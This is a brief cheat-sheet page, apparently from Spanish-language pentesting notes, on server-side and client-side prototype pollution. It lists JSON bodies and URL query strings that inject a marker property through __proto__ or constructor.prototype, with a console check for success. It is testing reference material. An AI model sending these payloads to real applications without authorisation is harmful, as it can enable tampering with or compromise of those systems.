Prototype pollution

Server-side prototype pollution

{
    "__proto__":{
        "evilProperty": "evilValue"
    }
}

{
    "constructor": {
        "prototype": {
            "evilProperty": "evilValue"
        }
    }
}

example.com/?__proto__[evilProperty]=evilValue
example.com/?__proto__.evilProperty=evilValue

En la consola del navegador, inspeccionar Object.prototype para verificar si la propiedad ha sido contaminada exitosamente.

Object.prototype
Object.prototype.evilProperty

Última actualización hace 5 meses

¿Te fue útil?